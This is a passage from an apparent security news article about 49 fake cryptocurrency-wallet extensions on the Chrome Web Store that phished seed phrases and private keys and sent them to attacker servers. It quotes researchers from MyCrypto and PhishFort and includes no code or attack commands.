Store that masqueraded as cryptocurrency wallets but contained
malicious code to siphon off sensitive information and empty the
digital currencies.
The 49 browser add-ons, potentially the work of Russian threat
actors, were identified[1] (find the list
here) by researchers from MyCrypto and PhishFort.
“Essentially, the extensions are phishing for secrets — mnemonic phrases,
private keys, and keystore files,” explained Harry Denley, director
of security at MyCrypto. “Once the user has entered them, the
extension sends an HTTP POST request to its backend, where the bad
actors receive the secrets and empty the accounts.”
[2]
Although the offending extensions were removed within 24 hours
after they were reported to Google, MyCrypto’s analysis showed that
they began to appear on the Web Store as early as February 2020,
before ramping up in subsequent months.
In addition, all the extensions functioned alike, the only
difference being the cryptocurrency wallet brands that were
impacted — such as Ledger, Trezor, Jaxx, Electrum, MyEtherWallet,
MetaMask, Exodus, and KeepKey — via 14 unique command-and-control
(C2) servers that received the phished data.
For instance, MEW CX, the malicious add-on targeting MyEtherWallet,
was found capturing the seed phrases and transmitting them to an
attacker-controlled server with an intention to drain the victim’s
wallet of digital funds.
However, funds were not stolen from every account this way. The
researchers theorize this could be either because the criminals are
after high-value accounts only or that they have to manually sweep
the accounts.
Some of the extensions, Denley said, came with fake five-star
reviews, thus increasing the chances that an unsuspecting user
might download it.
“There was also a network of vigilant users who wrote legitimate
reviews about the extensions being malicious — however, it is hard
to say if they were victims of the phishing scams themselves, or
just helping the community to not download,” Denley added.
Data stealing extensions have been a regular occurrence on the
Chrome Web Store, leading Google to purge them as soon as they’re
discovered. Back in February, the company removed 500 malicious
extensions[3] after they were caught
serving adware and sending users’ browsing activity to C2 servers
under the control of attackers.
If you suspect you have become a victim of a malicious browser
extension and lost funds, it’s recommended you file a report at
CryptoScamDB[4].
References
- ^
identified
(medium.com) - ^
mnemonic phrases
(en.bitcoin.it) - ^
500 malicious extensions
(thehackernews.com) - ^
CryptoScamDB
(cryptoscamdb.org)
Read more http://feedproxy.google.com/~r/TheHackersNews/~3/n_qcjIqhu2c/chrome-cryptocurrency-extensions.html